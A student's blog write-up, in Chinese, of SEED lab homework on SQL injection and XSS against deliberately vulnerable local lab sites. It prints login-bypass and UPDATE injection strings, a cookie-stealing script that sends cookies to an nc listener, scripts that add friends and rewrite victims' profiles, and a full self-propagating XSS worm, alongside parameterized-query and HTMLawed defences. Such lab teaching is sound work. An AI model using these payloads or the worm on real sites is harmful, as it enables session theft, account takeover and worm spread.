20252915时进旭 2025-2026-2 《网络攻防实践》第十周作业

一、实践内容

1.1SEED SQL注入攻击与防御实验

已经创建了一个Web应用程序,并将其托管在 www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:

熟悉SQL语句: 已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,需要使用数据库来熟悉SQL查询。

对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。

对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

SQL对抗:修复上述SQL注入攻击漏洞。

1.2SEED XSS跨站脚本攻击实验

为了演示攻击者可以利用XSS漏洞做什么,在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。

发布恶意消息,显示警报窗口:在Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看配置文件时,将执行JavaScript程序并显示一个警报窗口。

弹窗显示cookie信息:将cookie信息显示。

窃取受害者的cookies:将cookie发送给攻击者。

成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。

修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。

编写XSS蠕虫。

对抗XSS攻击。

二、实验简介方案

实验1.1首先通过手工方式熟悉数据库结构与SQL查询语句,随后对存在漏洞的登录模块与信息更新模块分别实施SELECT型和UPDATE型SQL注入攻击,成功实现了在未获知密码情况下的非法登录,以及对其他用户敏感信息(如薪资、密码)的越权篡改。

实验1.2通过在用户个人资料中嵌入恶意 JavaScript 代码,先后实现了弹窗警告、Cookie 窃取、自动添加好友及修改用户资料等多种攻击效果。

三、实践过程

重新部署seed靶机,页面中的第二个链接可用:

https://seedsecuritylabs.org/lab_env.html

3.0安装VMtools

点击上方虚拟机按键,选择重新安装VMware Tools:

image

得到压缩包:

解压 
mkdir -p /home/seed/Desktop/VM  #在桌面创建文件夹
cp VMwareTools-3.22-15902021.tar.gz /home/seed/Desktop/VM  #复制压缩包进去
cd /home/seed/Desktop/VM
tar -xzvf VMwareTools-3.22-15902021.tar.gz  #解压
cd vmware-tools-distrib
sudo ./vmware-install.pl
#安装过程中一路按Enter键接受默认选项即可,不装的话后面会很难受

3.1 SEED SQL注入攻击与防御实验

3.1.1 熟悉SQL语句

mysql -u root -p  #-u root: 指定要使用的用户名,这里是 root 用户。-p: 表示将提示我们输入密码来验证用户身份。在输入命令后,系统会提示您输入密码,然后按回车键确认。

密码:seedubuntu

image

show databases; #查看数据库

image

use Users;  #use 后面跟着数据库名称,表示进入该数据库。

show tables;  #显示当前数据库中的所有表格(或称为数据表)。

image

select * from credential;  #从名为 credential 的表格中检索所有的行和列,并将它们作为结果返回。

image

select * from credential where Name='Alice';   #从名为 credential 的表格中检索所有 Name 列的值等于 'Alice' 的行,并将它们作为结果返回。

image

3.1.2 对 SELECT 语句的SQL注入攻击

打开seedubuntu中的浏览器,里面有文件夹sites for labs,点击其中的SQL Injection Site进入登陆界面:

image

尝试一下弱口令:

admin/123456

image

登陆失败:

image

F12打开开发者工具,选择Network,再次刷新页面发现有三次交互:

image

发现一个用户名和密码的传递:

image

同时页面源代码也可看到关键在unsafe_home.php:

image

在Computer–Var–www–SQLInjection中找到unsafe_home.php源文件并分析:

传入用户名和密码:

image

将未处理的用户名和哈希加密的密码传入sql语句,且是单引号闭合,因此用户名可控:

image

接着看到登录用户分为管理员登录和普通用户登录:

image

接下来尝试登录Admin用户,在用户名框里输入Admin’#时sql语句变成下式:

$sql ="SELECT id, name, eid, salary, btrth, ssn, phoneNumber, address,email,nickname,Password FROM credential WHERE name= 'Admin'#' and Password='$hashed pwd'";
#后面为注释,因此密码被注释掉,实现任意密码登录

image

成功登录,看到用户信息:

image

3.1.3 对UPDATE语句的SQL注入攻击

打开unsafe_edit_backend.php文件查看相关指令,发现可以修改昵称、邮箱、地址、密码和ID号码:

image

首先使用用户名Samy’#进行登录:

image

缩小页面比例,点击Edit Profile进行修改:

image

image

输入下面内容把Samy的Salary修改为2827,修改好后点击Save,成功修改:

', salary='2827' where Name='Samy';#

image

3.1.4 SQL对抗

在上述实验中使用了SQL语句中的#会把后面代码注释掉、单引号会截断代码的特点,成功非法登录进了系统,针对这一漏洞,可以采用参数绑定的方法来进行修复,对于unsafe_home.php文件,我们进行如下修改

//原来的php代码:
$sql = "SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= '$input_uname' and Password='$hashed_pwd';";

//修改后的php代码:
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?;");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

修改后再次尝试登录:

image

登陆失败:

image
对于更改漏洞,对unsafe_edit_backend.php文件进行如下修改:

//原php代码
if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',Password='$hashed_pwd',PhoneNumber='$input_phonenumber' where ID=$id;";
  }else{
// if passowrd field is empty.
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";
}

//修改后的php代码:
if($input_pwd!=''){
// In case password field is not empty.
$hashed_pwd = sha1($input_pwd);
//Update the password stored in the session.
$_SESSION['pwd']=$hashed_pwd;
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("sssss", $input_nickname, $input_email, $input_address, $hashed_pwd, $input_phonenumber);
}else{
// if passowrd field is empty.
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email, $input_address, $input_phonenumber);
}

3.2 SEED XSS跨站脚本攻击实验

跨站脚本攻击XSS(Cross Site Scripting),通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。

XSS分为:存储型 、反射型 、DOM型三种

存储型XSS:存储型XSS,持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie

反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。反射型XSS大多数是用来盗取用户的Cookie信息。

DOM型XSS:不经过后端,DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,DOM-XSS是通过url传入参数去控制触发的,其实也属于反射型XSS。

3.2.1 发布恶意消息,显示警报窗口

打开浏览器中的XSS Lab Site:

用户名/密码
Alice/seedalice
Boby/seedboby
Samy/seedsamy
Admin/seedelgg

使用任一身份进行登录:

image

点击左上角“Alice”->“Edit Profile”,然后在“Brief description”中写入恶意代码:

<script>alert("20252915");</script> //弹出警告窗口,显示“20252915”

image

保存之后,每次访问都会弹出alert窗口:

image

把填入“Brief description”中的内容改为:

<script> alert(document.cookie);</script>

image

点击保存:

image

3.2.3 窃取受害者的 cookies

查看虚拟机地址:

image

再次进入编辑界面,在Brief description中输入:

<script>
  document.write('<img src=http://127.0.0.1:1234?c=' + escape(document.cookie) + '>');
</script>

#有一个很奇怪的现象是6666端口不能实现,换1234后可以实现,可能该端口被拦截

image

在终端中监听1234端口:

nc -l 1234 -v

登录Samy用户,搜索Alice,访问主页:

image

监听到以下内容,拿到cookie:

image

3.2.4 成为受害者的朋友

登录用户Samy, 搜索Alice:

image

打开开发者工具,点击Add Friend,同时观察数据流:

image

我们发现,点击按钮后浏览器向http://www.xsslabelgg.com/action/friends/add发送了GET请求,并附带了以下三个参数:

friend=44:请求添加的对象id
__elgg_ts=1715849723:时间戳
__elgg_token=8s6rxvluUUz-8kY8-VbeoQ:令牌

通过多次遍历可知:

Alice的id为44
Boby的id为45
Charlie的id为46
Samy的id为47
Admin的id为36

点击这条新指令得到这条指令的url,可以根据这条url构造payload,在Alice的About me栏中添加这段代码,可以做到无需审核直接添加好友。(注意,这里必须点击About me框右上角的edit html,才可以进行添加这段代码,否则添加不成功):

<p><script type="text/javascript">
window.onload = function () {
    var Ajax=null;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;


    //Construct the HTTP request to add Samy as a friend.
    var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=45" + ts + token;

    //Create and send Ajax request to add friend
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
    Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    Ajax.send();
}
</script></p>

image

发现已经成功添加好友:

image

3.2.5 修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改

将这一部分代码放入Alice用户profile的About Me中,首先编辑profile,然后单击About me最右侧的Edit HTML,在文本框中填入上述代码保存即可:

<script type="text/javascript">
	window.onload = function(){
  //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
  //and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
    var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;  
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	var aliceGuid=44;    
	if(elgg.session.user.guid!=aliceGuid){
   	//Create and send Ajax request to modify profile
   	var Ajax=null;
   	Ajax=new XMLHttpRequest();
   	Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send(content);
  }
}
</script>

image

然后退出Alice,使用Boby登录。确认Boby的profile为空:

image

在成员中访问Alice主页,再通过左上角返回自己的profile,即可发现自己的About me已经被修改:

image

image

3.2.6 编写XSS蠕虫

如上继续观察网页的代码和参数,可以编写以下代码:

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>";
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "&name=" + userName + "&description=<p>我是Alice 你已被入侵"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

将这一部分代码放入Alice用户profile的About Me中,首先编辑profile,然后单击About me最右侧的Edit HTML,在文本框中填入上述代码保存即可:

image

然后退出Alice,使用Boby登录。首先确认Boby的profile:

image

然后在成员中访问Alice主页,再通过左上角返回自己的profile,即可发现自己的About me已经再次被修改:

image

再登录Samy的账号访问Boby的主页,发现Samy也被修改:

image

3.2.7 对抗XSS攻击

登录管理员Admin的账户,点击右上角的Account–Administration进入管理界面后:

image

点击Plugins,并找到插件HTMLawed并点击Activate按钮激活该插件:

image

image

激活后,重新进行XSS攻击实验,例如,这里重新进行修改受害者主页信息的XSS攻击,就会发现,XSS攻击已经失效。对抗XSS攻击成功!
即,重新让Admin访问Alice,发现无法进行主页修改。

image

三、学习中遇到的问题及解决

3.1安装VMtools,解决主机代码编辑器写好的代码不能复制粘贴到虚拟机问题。
3.2监听端口时,6666端口不能监听到正常信息,更换端口成功解决。

四、实践总结

本次实验围绕 Web 应用安全中的两大经典漏洞——SQL 注入与 XSS 跨站脚本攻击展开了系统性的实践与研究。在 SEED SQL 注入实验中,通过操作 Users数据库的creditential表,深入理解了SQL语句的执行逻辑,成功实施了针对 SELECTUPDATE语句的注入攻击,实现了在无密码情况下的越权登录及敏感信息篡改,并在此基础上通过参数化查询等手段完成了 SQL 对抗防御。在 SEED XSS 实验中,以 Elgg 社交平台为靶场,从最初在用户配置文件中嵌入 JavaScript 实现弹窗、窃取 Cookie,逐步进阶到利用 DOM 操作自动化添加好友、修改受害者资料,最终编写出可在用户间自我传播的 XSS 蠕虫,完整复现了 XSS 攻击从信息泄露到恶意代码扩散的全过程。整个实验由浅入深,不仅揭示了后端数据库查询不安全拼接与前段输入过滤缺失所带来的严重危害,也强调了输入验证、输出编码及内容安全策略等防御机制在构建安全 Web 应用中的关键作用。

posted @ 2026-05-23 22:39  林木LinMw  阅读(3)  评论(0)    收藏  举报